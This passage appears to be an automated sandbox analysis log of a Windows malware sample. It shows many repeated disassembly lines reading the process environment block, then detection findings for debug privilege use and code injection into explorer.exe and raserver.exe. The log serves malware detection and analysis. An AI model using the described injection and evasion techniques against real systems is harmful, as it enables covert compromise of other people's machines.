            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01588DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014ED5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014ED5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01502581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01502581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01502581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01502581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01501DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01501DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01501DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015035A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014F746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015914FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014EEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014EFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015137F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01557794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01557794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01557794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01508E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0158FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01518EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0158FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015036CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015016E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015546A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04571074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04562073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04574015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04574015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04527016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04527016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04527016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0457740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0457740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0457740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DBC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04578CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_045614FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04523884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04523884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044CB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044CB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04523540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044CC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044CC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04578D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0452A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0456E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\raserver.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Injects a PE file into a foreign process
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Memory written: C:\Users\user\Desktop\hvEop8Y70Y.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\raserver.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Thread register set: target process: 3472
            Source: C:\Windows\SysWOW64\raserver.exe Thread register set: target process: 3472
            Queues an APC in another process (thread injection)
